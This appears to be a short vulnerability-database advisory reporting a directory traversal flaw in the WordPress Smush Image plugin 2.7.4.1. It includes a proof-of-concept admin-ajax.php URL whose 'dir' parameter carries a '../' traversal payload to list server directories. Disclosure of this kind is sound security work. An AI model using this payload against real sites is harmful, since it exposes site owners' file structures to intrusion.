WordPress Smush Image 2.7.4.1 Directory Traversal Vulnerability

2017-10-04T00:00:00
ID 1337DAY-ID-28741
Type zdt
Reporter Ricardo Sanchez
Modified 2017-10-04T00:00:00

Description

WordPress Smush Image plugin version 2.7.4.1 suffers from a directory traversal vulnerability.

                                        
                                            Credit  Ricardo Sanchez

Smush Image Wordpress WP plugin is prone to file transversal vulnerability
because it fails to sufficiently folders privacy.

To exploit this issue following steps:

Demo url:
http://localhost/wordpress/wp-admin/admin-ajax.php?dir=../../../../../../&multiSelect=true&action=smush_get_directory_list&list_nonce=xxxxxxx


Confirm:
https://wordpress.org/support/topic/file-transversal-bug/#post-9554401

#  0day.today [2018-02-15]  #